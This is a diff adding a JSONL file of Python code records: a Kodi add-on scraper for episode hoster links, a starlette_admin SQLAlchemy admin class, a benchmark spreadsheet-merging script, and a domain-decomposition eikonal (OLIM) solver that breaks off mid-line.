diff --git "a/2676.jsonl" "b/2676.jsonl" new file mode 100644--- /dev/null +++ "b/2676.jsonl" @@ -0,0 +1,713 @@ +{"seq_id":"620050439","text":"# -*- coding: utf-8 -*-\r\n\r\n'''\r\n Incursion Add-on\r\n\r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see .\r\n'''\r\n\r\nimport requests, re\r\nfrom bs4 import BeautifulSoup\r\n\r\nclass source:\r\n def __init__(self):\r\n self.priority = 1\r\n self.language = ['en']\r\n self.domain = 'http://rlsscn.in/'\r\n self.base_link = 'http://rlsscn.in/'\r\n self.search_link = '/?s=%s'\r\n\r\n def movie(self, imdb, title, localtitle, aliases, year):\r\n try:\r\n url = {'imdb': imdb, 'title': title, 'localtitle': localtitle, 'aliases': aliases, 'year': year}\r\n except:\r\n return\r\n\r\n def tvshow(self, imdb, tvdb, tvshowtitle, localtvshowtitle, aliases, year):\r\n try:\r\n url = {'imdb': imdb, 'tvdb': tvdb, 'tvshowtitle': tvshowtitle, 'year': year}\r\n return url\r\n except:\r\n return\r\n\r\n def episode(self, url, imdb, tvdb, title, premiered, season, episode):\r\n try:\r\n\r\n url['episode'] = episode\r\n url['season'] = season\r\n return url\r\n except:\r\n return\r\n\r\n def sources(self, url, hostDict, hostprDict):\r\n\r\n hostDict = hostDict + hostprDict\r\n\r\n sources = []\r\n season = url['season']\r\n episode = url['episode']\r\n if len(season) == 1:\r\n season = '0' + season\r\n if len(episode) == 1:\r\n episode = '0' + episode\r\n\r\n request =('%s+s%se%s' % (url['tvshowtitle'], season, episode)).replace(\" \", \"+\")\r\n request = self.base_link + self.search_link % request\r\n request = requests.get(request)\r\n\r\n soup = BeautifulSoup(request.text, 'html.parser')\r\n soup = soup.find('h2', {'class':'title'})\r\n request = soup.find('a')['href']\r\n request = requests.get(request)\r\n soup = BeautifulSoup(request.text, 'html.parser')\r\n soup = soup.find('div', {'id':'content'})\r\n soup = soup.find_all('a', {'class':'autohyperlink'})\r\n source_list = []\r\n\r\n for i in soup:\r\n for h in hostDict:\r\n if h in i['href']:\r\n if not '.rar' in i['href']:\r\n source_list.append(i['href'])\r\n for i in source_list:\r\n host = i.replace('www.', '')\r\n host = re.findall(r'://(.*?)\\..*?/', host)[0]\r\n\r\n if '1080p' in i:\r\n quality = '1080p'\r\n elif '720p' in i:\r\n quality = '720p'\r\n else:\r\n quality = 'SD'\r\n\r\n info = ''\r\n sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': i, 'info': info,\r\n 'direct': False, 'debridonly': True})\r\n\r\n return sources\r\n\r\n\r\n\r\n def resolve(self, url):\r\n return url\r\n","sub_path":"lib/lambdascrapers/sources_incursion/en_incursion-1.20(final)/rlsscn.py","file_name":"rlsscn.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"514640831","text":"import sqlalchemy as sa\nfrom sqlalchemy.sql.selectable import Select\nfrom starlette.exceptions import HTTPException\nfrom starlette_core.database import database\n\nfrom starlette_admin.admin import BaseAdmin\n\n\nclass ModelAdmin(BaseAdmin):\n \"\"\" The base admin class for sqlalchemy crud operations. \"\"\"\n\n model_class: sa.Table\n object_str_function = lambda self: self[\"id\"]\n\n @classmethod\n def get_default_ordering(cls, qs: Select) -> Select:\n return qs.order_by(\"id\")\n\n @classmethod\n def get_search_results(cls, qs: Select, term: str) -> Select:\n raise NotImplementedError()\n\n @classmethod\n def get_ordered_results(\n cls, qs: Select, order_by: str, order_direction: str\n ) -> Select:\n if order_by and order_direction and hasattr(cls.model_class.c, order_by):\n field = getattr(cls.model_class.c, order_by)\n if order_direction == \"desc\":\n qs = qs.order_by(field.desc())\n else:\n qs = qs.order_by(field)\n return qs\n\n @classmethod\n async def get_list_objects(cls, request):\n qs = cls.model_class.select()\n\n # if enabled, call `cls.get_search_results`\n search = request.query_params.get(\"search\", \"\").strip().lower()\n if cls.search_enabled and search:\n qs = cls.get_search_results(qs, search)\n\n # if enabled, sort the results\n order_by = request.query_params.get(\"order_by\")\n order_direction = request.query_params.get(\"order_direction\")\n if cls.order_enabled and order_by and order_direction:\n qs = cls.get_ordered_results(qs, order_by, order_direction)\n else:\n qs = cls.get_default_ordering(qs)\n\n return await database.fetch_all(qs)\n\n @classmethod\n async def get_object(cls, request):\n id = request.path_params[\"id\"]\n qs = cls.model_class.select().where(cls.model_class.c.id == id)\n obj = await database.fetch_one(qs)\n if not obj:\n raise HTTPException(404)\n obj.__class__.__str__ = cls.object_str_function\n return obj\n\n @classmethod\n async def do_create(cls, form, request):\n qs = cls.model_class.insert().values(**form.data)\n return await database.execute(qs)\n\n @classmethod\n async def do_delete(cls, instance, form, request):\n qs = cls.model_class.delete().where(cls.model_class.c.id == instance[\"id\"])\n await database.execute(qs)\n\n @classmethod\n async def do_update(cls, instance, form, request):\n qs = (\n cls.model_class.update()\n .where(cls.model_class.c.id == instance[\"id\"])\n .values(**form.data)\n )\n return await database.execute(qs)\n","sub_path":"starlette_admin/admin/model_admin.py","file_name":"model_admin.py","file_ext":"py","file_size_in_byte":2731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"601201341","text":"import warnings\nwarnings.simplefilter('ignore')\n\nimport shutil\nimport os\nimport time\nimport subprocess\nimport sys\nimport pandas as pd\n\ndef main():\n df_list=[]\n sg_list=[f\"SG{i}\" for i in range(1,231)]\n \n for sg in sg_list:\n if not os.path.exists(f\"out_benchmark_{sg}.xls\"):\n continue\n df_list.append(pd.read_excel(f\"out_benchmark_{sg}.xls\", index_col=0))\n\n for i, df_pd in enumerate(df_list):\n if i == 0:\n df_all= pd.DataFrame(columns=df_pd.columns)\n for j in range(len(df_pd)):\n df_all=df_all.append(df_pd.iloc[j], ignore_index=True)\n else:\n for j in range(len(df_pd)):\n df_all=df_all.append(df_pd.iloc[j], ignore_index=True)\n \n #df_all=df_all.reset_index(drop=True)\n df_all.to_excel(f\"out_benchmark_SG_all.xls\")\n \nif __name__ == \"__main__\":\n main()\n","sub_path":"benchmarks/03scailing_benchmark/bench_combine_xsl.py","file_name":"bench_combine_xsl.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"411395145","text":"import functools\nimport itertools\nimport numpy as np\nimport rtree\n\nfrom scipy.optimize import brentq\nfrom scipy.sparse import dok_matrix\nfrom scipy.spatial import Delaunay\nfrom scipy.spatial import cKDTree as KDTree\n\nimport constants\nimport interp\nimport ma\nimport pyolim\n\nfrom sparse_olim import get_boundary_layer_points\nfrom sparse_olim import get_stencils\nfrom sparse_olim import HeapNode\nfrom sparse_olim import SparseOlim2\n\nfrom surf import EmptySurf\nfrom surf import get_vertices\n\n_offsets = np.array([\n offset for offset in\n itertools.product(range(-1, 2), range(-1, 2))\n])\n\ndef _get_box(shape, ind):\n inds = np.array(ind) + _offsets\n return [tuple(ind_) for ind_ in inds if ma.is_inbounds(shape, ind_)]\n\n_tol = constants.TOL\n\ndef get_min(olim):\n if isinstance(olim, SparseOlim2):\n heap_node = olim.min()\n if heap_node is None:\n return heap_node\n else:\n return heap_node.U, heap_node.ind\n else:\n return olim.min()\n\ndef select(olims):\n U, argmin = np.inf, None\n for i, olim in enumerate(olims):\n if get_min(olim) is not None:\n U_min, _ = get_min(olim)\n if U_min < U:\n U, argmin = U_min, i\n return argmin\n\n\n@functools.singledispatch\ndef get_state(olim, ind):\n fmt = 'no implementation of `get_state` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_state.register\ndef _(olim: pyolim.Olim, ind):\n i = [b'', b'\\x01', b'\\x02', b'\\x03'].index(olim.state[ind])\n return pyolim.State(i)\n\n@get_state.register\ndef _(olim: SparseOlim2, ind):\n return pyolim.State(olim.state[ind])\n\ndef is_boundary(olim, ind):\n return get_state(olim, ind) == pyolim.State.BOUNDARY\n\ndef is_trial(olim, ind):\n return get_state(olim, ind) == pyolim.State.TRIAL\n\ndef is_far(olim, ind):\n return get_state(olim, ind) == pyolim.STATE.FAR\n\ndef is_valid(olim, ind):\n return get_state(olim, ind) == pyolim.STATE.VALID\n\n\n@functools.singledispatch\ndef get_updated_ghost_inds(olim, ghost_inds, changed, ind):\n fmt = 'no implementation of `get_updated_ghost_inds` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_updated_ghost_inds.register\ndef _(olim: pyolim.Olim, ghost_inds, changed, ind):\n shape = olim.shape\n box = _get_box(shape, ind)\n return [\n ind_ for ind_ in box\n if changed[ind_] and ind_ in ghost_inds[olim]\n ]\n\n@get_updated_ghost_inds.register\ndef _(olim: SparseOlim2, ghost_inds, changed, ind):\n return [\n i\n for i in np.where(changed)[0]\n if i in ghost_inds[olim]\n ]\n\n\n@functools.singledispatch\ndef get_ind_from_heap_node(node):\n fmt = 'no implementation of `get_ind_from_heap_node` for type %s'\n raise Exception(fmt % type(node))\n\n@get_ind_from_heap_node.register\ndef _(node: tuple):\n return node[1]\n\n@get_ind_from_heap_node.register\ndef _(node: HeapNode):\n return node.ind\n\n\n@functools.singledispatch\ndef are_neighbors(olim, ind1, ind2):\n fmt = 'no implementation of `are_neighbors` for type %s'\n raise Exception(fmt % type(node))\n\n@are_neighbors.register\ndef _(olim: pyolim.Olim, ind1, ind2):\n raise Exception('TODO: implement `are_neighbors` for `pyolim.Olim`')\n\n@are_neighbors.register\ndef _(olim: SparseOlim2, ind1, ind2):\n return ind1 in olim.nbs[ind2]\n\n\n@functools.singledispatch\ndef prioritize_heap_node(olim, ind):\n fmt = 'no implementation of `get_ind_from_heap_node` for type %s'\n raise Exception(fmt % type(node))\n\n@prioritize_heap_node.register\ndef _(olim: pyolim.Olim, ind):\n raise Exception('TODO: implement `prioritize_heap_node` for `pyolim.Olim`')\n\n@prioritize_heap_node.register\ndef _(olim: SparseOlim2, ind):\n i = next(\n i for i, node in enumerate(olim.heap)\n if node.ind == ind\n )\n if i is None:\n raise Exception(\"node with index %s doesn't exist in heap\" % (ind,))\n level = int(np.log2(i + 1)) # TODO: remove this\n ind0 = olim.heap[0].ind\n if are_neighbors(olim, ind, ind0):\n U_0 = olim.heap[0].U\n U_i = olim.heap[i].U\n if abs(U_0 - U_i) > _tol:\n raise Exception('|%s - %s| > %s' % (U_0, U_i, _tol))\n olim.heap[0], olim.heap[i] = olim.heap[i], olim.heap[0]\n\n\n@functools.singledispatch\ndef get_minimizer(olim, ind):\n fmt = 'no implementation of `get_minimizer` for type %s'\n raise Exception(fmt % type(olim))\n\n@get_minimizer.register\ndef _(olim: pyolim.Olim, ind):\n if is_boundary(olim, ind):\n raise Exception(\"can't get minimizer of boundary node\")\n\n line_inds = ma.get_plausible_line_inds(olim, ind)\n tri_ind_pairs = ma.get_plausible_tri_inds(olim, ind)\n tri_inds = ma.get_incident_inds(tri_ind_pairs)\n\n U_min = np.inf\n arg0, arg1, arglam = None, None, None\n\n for ind0 in line_inds:\n if ind0 in tri_inds:\n continue\n U = ma.line(olim, ind, ind0)\n if U < U_min:\n U_min, arg0 = U, ind0\n\n for ind0, ind1 in tri_ind_pairs:\n U, lam = ma.tri(olim, ind, ind0, ind1)\n if U < U_min:\n U_min, arg0, arg1, arglam = U, ind0, ind1, lam\n\n return U_min, arg0, arg1, arglam\n\n\n@get_minimizer.register\ndef _(olim: SparseOlim2, ind):\n if is_boundary(olim, ind):\n raise Exception(\"can't get minimizer of boundary node\")\n\n U_min = np.inf\n arg0, arg1, arglam = None, None, None\n\n for ind0 in olim.nbs[ind]:\n if ind0 in olim.tris[ind]:\n continue\n U = olim.line(ind, ind0)\n if U < U_min:\n U_min, arg0 = U, ind0\n\n for ind0, ind1 in olim.tris[ind]:\n U, lam = olim.tri(ind, ind0, ind1)\n if U < U_min:\n U_min, arg0, arg1, arglam = U, ind0, ind1, lam\n\n return U_min, arg0, arg1, arglam\n\n\n@functools.singledispatch\ndef add_src(olim, ind, U, virtual=False):\n fmt = 'no implementation of `add_src` for type %s'\n raise Exception(fmt % type(olim))\n\n@add_src.register\ndef _(olim: pyolim.Olim, ind, U, virtual=False):\n olim.add_src(ind, U)\n\n@add_src.register\ndef _(olim: SparseOlim2, ind, U, virtual=False):\n olim.add_src(ind, U, virtual)\n\n\ndef step(olims, other_olim, ghost_inds, check_consistency=False, verbose=False):\n '''TODO: add some docs'''\n\n early_prio, late_prio = False, False\n\n # First, select the next OLIM to step. Return if the decomposed\n # problem is solved\n i = select(olims)\n if i is None:\n return None\n if verbose:\n print('updating olim%d:' % (i + 1))\n\n # Set up some variables\n selected_index = i # in case we overwrite i\n olim, olim_ = olims[i], other_olim[olims[i]]\n\n # When updating a ghost node, note that there may be multiple\n # minima in the other OLIM's front. If this happens, we swap the\n # desired node to the front of the OLIM so that when we update\n # each OLIM, we update ghost nodes that correspond with one\n # another.\n ind = get_ind_from_heap_node(olim.min())\n if ind in ghost_inds[olim]:\n ind_ = get_ind_from_heap_node(olim_.min())\n if ind_ != ghost_inds[olim][ind]:\n target = ghost_inds[olim][ind]\n print('early prioritization')\n early_prio = True\n prioritize_heap_node(olim_, target)\n\n # Do a quick consistency check and make sure that if we're\n # updating a ghost node, we'll be updating the correct ghost node\n # in the other OLIM\n U, ind = get_min(olim)\n if ind in ghost_inds[olim]:\n U_, ind_ = get_min(olim_)\n if ghost_inds[olim][ind] != ind_:\n raise Exception('ghost_inds[olim][%s] == %s != %s' % (\n ind, ghost_inds[olim][ind], ind_\n ))\n if abs(U - U_) > _tol:\n raise Exception('|%s - %s| > %s' % (U, U_, _tol))\n\n # Get a view of the OLIM-to-be-updated before we step it\n # forward---we need it to check and see which ghost nodes were\n # changed\n prev_U = olim.U.copy() # very bad!\n\n # Step the OLIM, and find the indices of the ghost nodes of the\n # OLIM-to-be-updated that have been modified after stepping\n ind = olim.step()\n updated_ind = ind # to return (mainly for plotting)\n updated_ghost_inds = get_updated_ghost_inds(\n olim, ghost_inds, olim.U != prev_U, ind\n )\n\n # Adjust the values of the updated ghost nodes in the other OLIM\n # (thereby fixing their position in the heap). There may be nodes\n # that aren't TRIAL yet---\"add a source\" to deal with those\n if len(updated_ghost_inds) > 0:\n if verbose:\n print('synchronizing: adjusting nodes in other olim')\n for updated_ghost_ind in updated_ghost_inds:\n ind_ = ghost_inds[olim][updated_ghost_ind]\n U_ghost = olim.U[updated_ghost_ind]\n assert U_ghost >= U\n if get_state(olim_, ind_) == pyolim.State.TRIAL:\n olim_.adjust(ind_, U_ghost)\n else:\n add_src(olim_, ind_, U_ghost, virtual=True)\n U_ghost_ = olim_.U[ind_]\n assert U_ghost == U_ghost_\n\n if ind in ghost_inds[olim]:\n if verbose:\n print('synchronizing: stepping `olim_`')\n prev_U_ = olim_.U.copy() # very bad!\n\n # It can happen that there are multiple minima in the\n # front. When this happens, we need to make sure we pull out\n # the one which matches `ind`.\n # ind_ = olim_.step()\n ind_ = get_ind_from_heap_node(olim_.min())\n # If they don't agree, we pull the right node out of the heap\n if ind_ != ghost_inds[olim][ind]:\n target = ghost_inds[olim][ind]\n print('late prioritization')\n late_prio = True\n prioritize_heap_node(olim_, target)\n ind_ = olim_.step()\n\n if ind_ != ghost_inds[olim][ind]:\n raise Exception(\n 'new valid node in `olim` != new valid node in `olim_`')\n if abs(olim.U[ind] - olim_.U[ind_]) > _tol:\n raise Exception('|%s - %s| > %s' % (\n olim.U[ind], olim_.U[ind_], _tol\n ))\n if verbose:\n print('synchronizing: adjusting nodes in `olim`')\n changed_ = olim_.U != prev_U_\n updated_ghost_inds_ = get_updated_ghost_inds(\n olim_, ghost_inds, changed_, ind_)\n if verbose:\n print('- olim%d, heap ind = %s, updated ghost inds = %s' % (\n 2 - i, ind_, updated_ghost_inds_))\n for updated_ghost_ind_ in updated_ghost_inds_:\n updated_ghost_ind__ = ghost_inds[olim_][updated_ghost_ind_]\n if verbose:\n print(' + updating ghost nodes %s & %s' % (\n updated_ghost_ind_, updated_ghost_ind__))\n U_min = min(olim.U[updated_ghost_ind__], olim_.U[updated_ghost_ind_])\n olim.adjust(updated_ghost_ind__, U_min)\n olim_.adjust(updated_ghost_ind_, U_min)\n if olim.U[updated_ghost_ind__] != olim_.U[updated_ghost_ind_]:\n raise Exception(\"values aren't equal after adjustment across bd\")\n\n # Check that the domain's ghost layers are consistent\n if check_consistency:\n # Check that corresponding ghost nodes have the same value\n errors = [\n 0.0 if np.isinf(olim.U[ind]) and np.isinf(olim_.U[ind_])\n else np.abs(olim.U[ind] - olim_.U[ind_])\n for ind, ind_ in ghost_inds[olim].items()\n ]\n if any(e > _tol for e in errors):\n print(errors)\n raise Exception('ghost layers are inconsistent')\n # ... and that they have the same state\n states = [\n (get_state(olim, ind), get_state(olim_, ind_))\n for ind, ind_ in ghost_inds[olim].items()\n ]\n for state1, state2 in states:\n if state1 != state2:\n print(states)\n raise Exception('ghost layers are inconsistent')\n\n return selected_index, updated_ind\n\ndef solve(*args, **kwargs):\n results = step(*args, **kwargs)\n while results is not None:\n results = step(*args, **kwargs)\n\nclass SimpleDomainDecomposition(object):\n '''A class encapsulating a basic domain decomposition algorithm where\n the \"ambient domain\" is a rectangular, equispaced grid, and the\n boundary is specified by a *single* implicit surface, derived from\n BaseSurf (note that this still allows for a complex boundary built\n up through CSG operations on implicit surfaces). The limitation of\n this class (why it is \"Simple\") is that it only decomposes the\n domain into *two* pieces---an interior domain consisting only of\n nodes lying on the equispaced grid, and a boundary layer domain\n which includes nodes that lie on the surface of the boundary, and\n most likely need to be handled using an unstructured OLIM.\n\n '''\n def __init__(self, grid, surf, slowness, shadow=False):\n self.grid = grid\n self.surf = surf\n self.slowness = slowness\n self.shadow = shadow\n\n if self.shadow:\n self._olim = SimpleDomainDecomposition(\n grid, surf, slowness, shadow=False\n )\n self._empty_surf = EmptySurf()\n self._shadow_tol = (self.h*np.log(1/self.h))**2\n\n # Find the nodes that will belong to the boundary layer,\n # including a layer of ghost nodes which will overlap with a\n # corresponding layer of ghost nodes in the \"interior\" of the\n # domain (i.e., the part of the domain away from the boundary)\n self.boundary_layer_points = get_boundary_layer_points(\n self.surf,\n self.h,\n self.grid\n )\n self._boundary_layer_kdtree = KDTree(self.boundary_layer_points)\n if self.shadow:\n new_points = []\n for ind in zip(*np.where(self.phi(*self.grid.Xs) < 0)):\n point = self.grid[ind]\n dist, _ = self._boundary_layer_kdtree.query(point)\n if dist < _tol:\n continue\n if dist < 1.5*self.h + _tol:\n new_points.append(point)\n self.boundary_layer_points = np.row_stack([\n self.boundary_layer_points,\n new_points\n ])\n\n # Compute the stencils (the line updates and triangle updates\n # for each node) that will be used by the boundary layer OLIM\n self.boundary_layer_stencil = get_stencils(\n self._empty_surf if self.shadow else self.surf,\n self.boundary_layer_points,\n self.h\n )\n\n # Finally, initialize the boundary layer solver itself\n self.boundary_layer_olim = SparseOlim2(\n self.boundary_layer_points,\n *self.boundary_layer_stencil,\n self.slowness(*self.boundary_layer_points.T)\n )\n\n # Next, get the boundary layer nodes that are grid-aligned. We\n # need these to determine the interior OLIM's nodes that\n # should have `boundary` state, as well as to correctly set up\n # the ghost node bimap\n inds, where = self.grid.get_indices_of_grid_aligned_points(\n self.boundary_layer_points\n )\n\n # Determine the nodes of the interior OLIM that will have\n # `boundary` state\n interior_boundary = dok_matrix(self.shape, dtype=bool)\n for ind in inds:\n interior_boundary[ind] = True\n if not self.shadow:\n for ind in zip(*np.where(self.phi(*self.grid.Xs) <= 0)):\n interior_boundary[ind] = True\n interior_boundary = ma.erode(interior_boundary)\n\n # Set up one direction of the ghost node bimap (i.e., the\n # bimap which will allow us to map back and forth between\n # ghost nodes in either the boundary layer OLIM or the\n # interior OLIM\n self.interior_to_boundary_layer = {\n ind: i\n for i, ind in zip(where, inds)\n if ind not in interior_boundary\n }\n\n # A quick sanity check---just make sure that the bimap is set\n # up correctly!\n for ind, i in self.interior_to_boundary_layer.items():\n p = self.boundary_layer_points[i, :]\n q = self.grid[ind]\n error = np.linalg.norm(p - q)\n if error > _tol:\n raise Exception('|%s - %s| = %s > %s' % (p, q, error, _tol))\n ind_ = (p - self.grid.xmin)/self.h\n ind_err = np.linalg.norm(ind - ind_)\n if ind_err > _tol:\n raise Exception('|err| = %s > %s' % (ind_err, _tol))\n\n # To complete the bimap, just create another map with the keys\n # and indices reversed\n self.boundary_layer_to_interior = {\n i: ind\n for ind, i in self.interior_to_boundary_layer.items()\n }\n\n # Now, set up the interior OLIM, setting the state of boundary\n # nodes after initializing it\n self.interior_olim = pyolim.Olim(\n pyolim.Neighborhood.OLIM8, # hardcoded for now\n pyolim.Quadrature.MP0, # hardcoded for now\n self.slowness(*self.grid.Xs),\n self.h\n )\n for ind in interior_boundary.keys():\n if ind in self.interior_to_boundary_layer:\n raise Exception('%s is already a ghost node' % (ind,))\n self.interior_olim.add_bd(ind)\n\n # Set up the three variables (`_olim`, `_other_olim`,\n # `_ghost_inds`) required by the `step` and `solve` functions\n # that run the domain decomposition solver (defined in this\n # module)\n self._olims = [\n self.interior_olim,\n self.boundary_layer_olim\n ]\n self._other_olim = {\n self.interior_olim: self.boundary_layer_olim,\n self.boundary_layer_olim: self.interior_olim\n }\n self._ghost_inds = {\n self.interior_olim: self.interior_to_boundary_layer,\n self.boundary_layer_olim: self.boundary_layer_to_interior\n }\n\n # Set some variables that back properties (defined below)\n # initially to `None` here---the values of these variables are\n # read-only, and computed and memoized on first use\n self.__nonghost_interior_points = None\n self.__nonghost_interior_point_indices = None\n self._points = None\n self._src_inds = None\n\n # TODO: this variable is used by a few other classes. It isn't\n # great that we are storing this, but we'll figure out a\n # better way to do this later.\n self._nonghost_linear_inds = np.empty(self.shape, dtype=int)\n self._nonghost_linear_inds[...] = -1\n for i, ind in enumerate(self._nonghost_interior_point_indices):\n self._nonghost_linear_inds[tuple(ind)] = i\n\n # Set up a dictionary of backpointers from vertices in S to \n # boundary layer points\n self._vert_ind_to_bl_ind = dict()\n for i, p in enumerate(self.surf.vertices):\n j = np.argmin(np.sum((self.boundary_layer_points - p)**2, axis=1))\n assert np.linalg.norm(self.boundary_layer_points[j] - p) < _tol\n self._vert_ind_to_bl_ind[i] = int(j)\n\n @property\n def grid(self):\n return self._grid\n\n @property\n def phi(self):\n return self.surf.phi\n\n # TODO: probably best to just remove this entirely... We don't\n # want to change `grid` after initializing an instance of this\n # class\n @grid.setter\n def grid(self, G):\n # TODO: check that G is equispaced...\n self._grid = G\n\n @property\n def shape(self):\n return self.grid.shape\n\n @property\n def h(self):\n return self.grid.h\n\n @property\n def src_inds(self):\n if self._src_inds is None:\n self._src_inds = []\n return self._src_inds\n\n def add_boundary_layer_source(self, ind, U=0.0):\n if ind in self.boundary_layer_to_interior:\n raise Exception('''adding boundary layer sources that coincide\nwith ghost nodes is unsupported for now''')\n self.boundary_layer_olim.add_src(ind, U)\n self.src_inds.append(ind)\n # TODO: this is awful... we really don't want to have to do\n # this!\n if self.shadow:\n self._olim.add_boundary_layer_source(ind, U)\n\n def add_interior_source(self, ind, U=0.0):\n if ind in self.interior_to_boundary_layer:\n raise Exception('''adding interior sources that coincide with\nghost nodes is unsupported for now''')\n self.interior_olim.add_src(ind, U)\n self.src_inds.append(ind)\n if self.shadow:\n self._olim.add_interior_source(ind, U)\n\n def add_sources(self, inds, Us=None):\n if Us is not None:\n assert len(Us) == len(inds)\n for ind, U in zip(inds, Us):\n if isinstance(ind, tuple):\n self.add_interior_source(ind, U)\n else:\n if not isinstance(ind, int):\n import pdb; pdb.set_trace()\n assert isinstance(ind, int)\n self.add_boundary_layer_source(ind, U)\n else:\n for ind in inds:\n if isinstance(ind, tuple):\n self.add_interior_source(ind)\n else:\n assert isinstance(ind, int)\n self.add_boundary_layer_source(ind)\n\n def step(self, check_consistency=False, verbose=False):\n return step(\n self._olims,\n self._other_olim,\n self._ghost_inds,\n check_consistency=check_consistency,\n verbose=verbose\n )\n\n def solve(self, check_consistency=False, verbose=False):\n _ = self.step(check_consistency, verbose)\n while _ is not None:\n _ = self.step(check_consistency, verbose)\n if self.shadow:\n self._olim.solve(check_consistency, verbose)\n\n def _compute_nonghost_interior_points_and_indices(self):\n indices, points = [], []\n if self.shadow:\n extra_indices, extra_points = [], []\n for ind, p in zip(\n self.grid.get_indices(),\n self.grid.get_points()\n ):\n if ind in self.interior_to_boundary_layer:\n continue\n if self.interior_olim.state[ind] == b'\\x03':\n continue\n if self.phi(*p) <= 0:\n if self.shadow:\n extra_indices.append(ind)\n extra_points.append(p)\n continue\n indices.append(ind)\n points.append(p)\n if self.shadow:\n indices.extend(extra_indices)\n points.extend(extra_points)\n self.__nonghost_interior_point_indices = np.array(indices)\n self.__nonghost_interior_points = np.array(points)\n\n @property\n def _nonghost_interior_point_indices(self):\n if self.__nonghost_interior_point_indices is None:\n self._compute_nonghost_interior_points_and_indices()\n return self.__nonghost_interior_point_indices\n\n @property\n def _nonghost_interior_points(self):\n if self.__nonghost_interior_points is None:\n self._compute_nonghost_interior_points_and_indices()\n return self.__nonghost_interior_points\n\n @property\n def points(self):\n if self._points is None:\n self._points = np.row_stack([\n self._nonghost_interior_points,\n self.boundary_layer_points\n ])\n return self._points\n\n @property\n def size(self):\n return self.points.shape[0]\n\n @property\n def ndim(self):\n return self.points.shape[1]\n\n def _get_values(self):\n if not self.shadow:\n n = self._nonghost_interior_points.shape[0]\n return np.array([\n self.interior_olim.U[\n tuple(self._nonghost_interior_point_indices[i])\n ]\n if i < n else self.boundary_layer_olim.U[i - n]\n for i in range(self.size)\n ])\n else:\n n1 = self._olim._nonghost_interior_points.shape[0]\n n2 = len(self._olim.boundary_layer_olim)\n def get_Z(U, U_direct):\n # return 1.0 if U - U_direct > self._shadow_tol else 0.0\n return float(U - U_direct > self.h**2)\n return np.concatenate([\n np.array([\n get_Z(\n self._olim.interior_olim.U[\n tuple(self._olim._nonghost_interior_point_indices[i])\n ],\n self.interior_olim.U[\n tuple(self._nonghost_interior_point_indices[i])\n ]\n )\n for i in range(n1)\n ]),\n np.array([\n get_Z(\n self._olim.boundary_layer_olim.U[i],\n self.boundary_layer_olim.U[i]\n )\n for i in range(n2)\n ])\n ])\n\n def get_nearest_neighbor_interpolator(self, ignore_surface=False):\n interpolator = interp.NearestNeighborInterpolator(\n self._olim.points if self.shadow else self.points,\n self._get_values()\n )\n return np.vectorize(\n interpolator if ignore_surface else\n lambda *x: np.nan if self.phi(*x) + _tol <= 0 else interpolator(*x)\n )\n\n class BilinearInterpolator(object):\n\n def __init__(self, olimdd):\n self._olimdd = olimdd\n self._U = self._olimdd.boundary_layer_olim.U\n self._P = olimdd.boundary_layer_points\n\n self._triangulation = Delaunay(self._P)\n self._F = self._triangulation.simplices\n\n # Build RTree for looking up triangles used for interpolation\n self._rtree = rtree.index.Index()\n for i, f in enumerate(self._F):\n P = self._P[f]\n bbox = (*np.min(P, axis=0), *np.max(P, axis=0))\n self._rtree.insert(i, bbox)\n\n def _get_bary_coords(self, p, i):\n p0, p1, p2 = self._P[self._F[i]]\n return np.linalg.solve(np.column_stack([p1 - p0, p2 - p0]), p - p0)\n\n def _valid_bary_coords(self, lam):\n return np.all(lam >= -_tol) and np.sum(lam) <= 1 + _tol\n\n def _tri_interp(self, p, i, lam):\n U0 = self._U[self._F[i, 0]]\n dU = np.array([self._U[j] for j in self._F[i, 1:]]) - U0\n return U0 + dU@lam\n\n def _get_intersected_tri_inds(self, p):\n return self._rtree.intersection((p[0], p[1], p[0], p[1]))\n\n def _interp_boundary_layer(self, *p):\n for i in self._get_intersected_tri_inds(p):\n lam = self._get_bary_coords(p, i)\n if self._valid_bary_coords(lam):\n return self._tri_interp(p, i, lam)\n assert False\n\n def _interp_interior(self, *p):\n # Well, this is ugly! There's probably a nicer way to\n # write this\n G = self._olimdd.grid\n points = self._olimdd.grid.get_nearest_points(p)\n x, y = p\n xs, ys = (np.unique(coords) for coords in points.T)\n if len(xs) == 1 and len(ys) == 1:\n return self._olimdd.interior_olim.U[\n tuple(G.get_nearest_ind(*p))\n ]\n elif len(xs) == 1:\n ymin, ymax = ys\n ty = (y - ymin)/(ymax - ymin)\n i = int(G.get_ind_along_axis(xs[0], 0))\n jmin = int(G.get_ind_along_axis(ymin, 1))\n jmax = int(G.get_ind_along_axis(ymax, 1))\n U0 = self._olimdd.interior_olim.U[i, jmin]\n U1 = self._olimdd.interior_olim.U[i, jmax]\n return (1 - ty)*U0 + ty*U1\n elif len(ys) == 1:\n xmin, xmax = xs\n tx = (x - xmin)/(xmax - xmin)\n imin = int(G.get_ind_along_axis(xmin, 0))\n imax = int(G.get_ind_along_axis(xmax, 0))\n j = int(G.get_ind_along_axis(ys[0], 1))\n U0 = self._olimdd.interior_olim.U[imin, j]\n U1 = self._olimdd.interior_olim.U[imax, j]\n return (1 - tx)*U0 + tx*U1\n else:\n xmin, xmax = xs\n ymin, ymax = ys\n tx = (x - xmin)/(xmax - xmin)\n ty = (y - ymin)/(ymax - ymin)\n imin = int(G.get_ind_along_axis(xmin, 0))\n imax = int(G.get_ind_along_axis(xmax, 0))\n jmin = int(G.get_ind_along_axis(ymin, 1))\n jmax = int(G.get_ind_along_axis(ymax, 1))\n U00 = self._olimdd.interior_olim.U[imin, jmin]\n U10 = self._olimdd.interior_olim.U[imax, jmin]\n U01 = self._olimdd.interior_olim.U[imin, jmax]\n U11 = 